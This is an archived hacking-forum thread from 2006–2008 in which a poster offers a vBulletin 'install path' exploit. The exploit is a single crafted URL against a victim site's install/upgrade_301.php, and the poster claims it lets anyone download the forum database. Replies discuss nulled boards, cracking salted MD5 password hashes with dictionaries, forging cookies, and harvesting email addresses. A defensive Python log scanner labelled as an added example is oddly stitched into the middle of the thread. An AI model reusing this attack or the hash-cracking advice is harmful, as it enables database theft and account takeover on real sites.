M4k3
Jul 5 2006, 07:10 PM
Hello,
Here I will show you how to hack a vBulletin 3.5.4:
video:
CODE
http://www.pldsecurity.de/sec.videos/vbulletin/vbulletinhack.swf
exploit:
CODE
##############################################
vBulletin 3.5.4 exploit.....install path is open or not secure
###############################################
Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com
Remote : Yes
Critical Level : Dangerous
############################################
Affected software description :
Application : vbulletin
version : latest version [ 3.60 Release 4 ]
URL : http://www.vbulletin.com
########################################
Exploit:
www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://ww.pldsoft.com
when it works, you can still download the database.....
########################################
Contact:
Nick: M4k3
E-mail: mikathebest2003@yahoo.de
Homepage: http://www.pldsoft.com
Mouhahaha
Jul 5 2006, 08:29 PM
Seems nice, can someone upload the video somewhere else? I can't download from rapidshare... thanks
stay
Jul 5 2006, 09:07 PM
see attachment
Mouhahaha
Jul 5 2006, 09:16 PM
Thanks a lot!
thend
Jul 6 2006, 07:37 AM
I think all the hashes are salted md5 and can't be easily cracked. What about crafting a cookie :). Hard
M4k3
Jul 6 2006, 09:59 AM
QUOTE(thend @ Jul 6 2006, 07:37 AM)

I think all the hashes are salted md5 and can't be easily cracked. What about crafting a cookie :). Hard
You'd need rainbow tables with all possible salt(s) combinations...
darkbluefirefly
Jul 6 2006, 02:56 PM
What if it asks for customer id? Then the exploit is invalid, right?
M4k3
Jul 6 2006, 03:04 PM
Well, then the board is protected. I'm still working on new exploits that will break it down.
crock
Jul 6 2006, 07:06 PM
could you post the php-code where the error is located in upgrade_301.php please?
It's probably just a variable that can be accessed only if globals is on in php.ini ... no?
KonT
Jul 6 2006, 08:26 PM
Coool
M4k3
Jul 6 2006, 09:19 PM
QUOTE(crock @ Jul 6 2006, 07:06 PM)

could you post the php-code where the error is located in upgrade_301.php please?
It's probably just a variable that can be accessed only if globals is on in php.ini ... no?
Most files in the install folder have this error,
like upgrade_302.php etc...
I will post the php-code tomorrow....
Novalok
Jul 6 2006, 10:33 PM
This is just nulled boards. Am I correct?
M4k3
Jul 7 2006, 07:02 AM
Nulled boards, but you can also try the normal version; sometimes it works.
You can only use this against ripped vbulletin software because it's only vulnerable if they remove that identification thing, which rippers do so people are able to use the forum software. So vbulletin is not vulnerable, only the ripped versions of it are.
-toe
boshcash
Jul 8 2006, 12:34 AM
The nulled scripts only are vuln, and you can't make anything except collect database info from this exploit, I think, because the md5 are encrypted with random salts, so it's almost impossible to crack them using tables because no one currently has tables for every possible salt.

Btw, this was known a couple of months ago. I used to test it on some boards (this may be used to harvest mails or any evil idea), but I don't know if it's really a vuln or not, and I don't think vbulletin will respond because the legit forums are secure...
FiSh
Jul 12 2006, 05:49 AM
The salts are found in the same table as the usernames. Using PasswordsPro you can crack the hashes (with salts) using dictionaries, and in some cases going to the 4th step causes a MySQL database error that does not allow the site to be accessed.
This is only an issue with nulled versions of vBulletin - legitimate versions downloaded from vBulletin require authentication of one type or another.
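An added example, not part of the thread or any poster's code: a log check a board admin could run to see whether scripts under install/ (such as the upgrade_301.php and upgrade_302.php named above) were requested and actually served. The /forum/ path and the log lines are constructed, and treating a non-numeric step value as unusual is an assumption based on the thread's references to numbered steps.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Any PHP script directly under an install/ directory
INSTALL_RE = re.compile(r'/install/([\w.-]+\.php)$', re.IGNORECASE)

def find_install_hits(lines):
    """Return one finding per request that targeted a script under install/."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, when, _method, target, status, _size = m.groups()
        parts = urlsplit(target)
        script = INSTALL_RE.search(parts.path)
        if not script:
            continue
        step = parse_qs(parts.query, keep_blank_values=True).get("step", [""])[0]
        findings.append({
            "client": client,
            "time": when,
            "script": script.group(1),
            # 2xx: the installer script was reachable and answered the request
            "served": status.startswith("2"),
            # assumption: legitimate step values are numbers
            "odd_step": bool(step) and not step.isdigit(),
        })
    return findings

# Constructed sample lines (documentation address ranges, hypothetical paths)
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jul/2006:19:12:01 +0000] "GET /forum/install/upgrade_301.php?step=http://example.invalid HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Jul/2006:19:12:09 +0000] "GET /forum/install/upgrade_302.php?step=4 HTTP/1.1" 200 2048',
    '198.51.100.20 - - [05/Jul/2006:19:13:30 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 9000',
    '198.51.100.9 - - [05/Jul/2006:19:14:02 +0000] "GET /forum/install/upgrade_301.php HTTP/1.1" 403 210',
]

if __name__ == "__main__":
    for hit in find_install_hits(SAMPLE_LOG):
        state = "SERVED" if hit["served"] else "blocked"
        odd = " non-numeric step" if hit["odd_step"] else ""
        print(f'{hit["time"]} {hit["client"]} {hit["script"]} {state}{odd}')
```

Any "SERVED" finding means the install/ directory is still reachable from the web and should be removed or blocked at the web server.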
M4k3
Jul 12 2006, 09:37 AM
QUOTE(FiSh @ Jul 12 2006, 05:49 AM)

This is only an issue with nulled versions of vBulletin - legitimate versions downloaded from vBulletin require authentication of one type or another.
I think I have said it 100 times or more... but now for you again. We are working on cracking the customer numbers... but it will take a while.
Mouhahaha
Jul 13 2006, 03:53 PM
hehehe good luck on "cracking" the customer numbers...
M4k3
Jul 13 2006, 08:36 PM
Well, everybody says cracking... but I never said I will crack it... cracking seems too long. There are much better ways.
runtime
Aug 2 2006, 08:47 PM
Lovely video. I like it a lot. But I can see the kiddies among us who want to be ub3r l33t in their spare time on their Windows 98 running on an Intel MMX overclocked to 400mhz by their sister, looking at this video, memorising it, and then saying "I'm l33t! L0LZ!!!!1!!!"
Heh heh, and then again, maybe not...
Canucka
Oct 5 2008, 08:58 PM
QUOTE (stay @ Jul 5 2006, 10:07 PM)

see attachment
Can't download
illwill
Oct 5 2008, 10:09 PM
QUOTE (Canucka @ Oct 5 2008, 03:58 PM)

Can't download
Thanks for opening an old thread, Captain Obvious.
Look at the date it was posted, not a lot of shit sticks around for 2 years
Eduardo
Oct 6 2008, 04:22 AM
He can't download it because he is a trial member.
Canucka, I suggest you re-read the rules, as they state trials cannot download files from this forum except from the trial members download section.